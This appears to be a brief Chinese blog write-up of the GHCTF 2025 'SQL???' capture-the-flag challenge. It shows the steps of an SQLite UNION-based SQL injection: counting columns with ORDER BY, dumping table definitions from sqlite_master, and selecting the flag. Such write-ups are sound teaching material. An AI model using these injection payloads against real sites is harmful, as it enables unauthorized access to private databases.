[GHCTF 2025]SQL???

打开题目在线环境:

先尝试注入:

id=1;show databases;

发现报错,后来看了wp才知道这个题目是SQLite注入。

我看的是这个师傅的wp:

https://blog.csdn.net/2401_86190146/article/details/146164505?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522b2e94c28c4b9713fffb8456c983de1b3%2522%252C%2522scm%2522%253A%252220140713.130102334...%2522%257D\&request_id=b2e94c28c4b9713fffb8456c983de1b3\&biz_id=0\&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend\~default-1-146164505-null-null.142^v102^pc_search_result_base9\&utm_term=[GHCTF 2025]SQL\&spm=1018.2226.3001.4187

1.先判断有几列

python 复制代码
? id=1 order by 6 #

到第六列时:

2.爆出来表名

python 复制代码
/?id=1 union select 1,2,3,4,group_concat(sql) from sqlite_master

所以我们要找的就是flag表里的flag列

直接payload:

python 复制代码
/?id=1 union select 1,2,3,4,flag from flag

在这里插入图片描述

相关推荐
苦夏木禾13 分钟前
js请求避免缓存的三种方式
开发语言·javascript·缓存
重庆小透明18 分钟前
力扣刷题记录【1】146.LRU缓存
java·后端·学习·算法·leetcode·缓存
超级土豆粉21 分钟前
Turndown.js: 优雅地将 HTML 转换为 Markdown
开发语言·javascript·html
lang2015092823 分钟前
Reactor操作符的共享与复用
java
TTc_34 分钟前
@Transactional事务注解的批量回滚机制
java·事务
wei_shuo1 小时前
飞算 JavaAI 开发助手:深度学习驱动下的 Java 全链路智能开发新范式
java·开发语言·飞算javaai
熊猫钓鱼>_>1 小时前
用Python解锁图像处理之力:从基础到智能应用的深度探索
开发语言·图像处理·python
GO兔2 小时前
开篇:GORM入门——Go语言的ORM王者
开发语言·后端·golang·go
欧阳秦穆2 小时前
apoc-5.24.0-extended.jar 和 apoc-4.4.0.36-all.jar 啥区别
java·jar
好开心啊没烦恼2 小时前
Python 数据分析:numpy,抽提,整数数组索引与基本索引扩展(元组传参)。听故事学知识点怎么这么容易?
开发语言·人工智能·python·数据挖掘·数据分析·numpy·pandas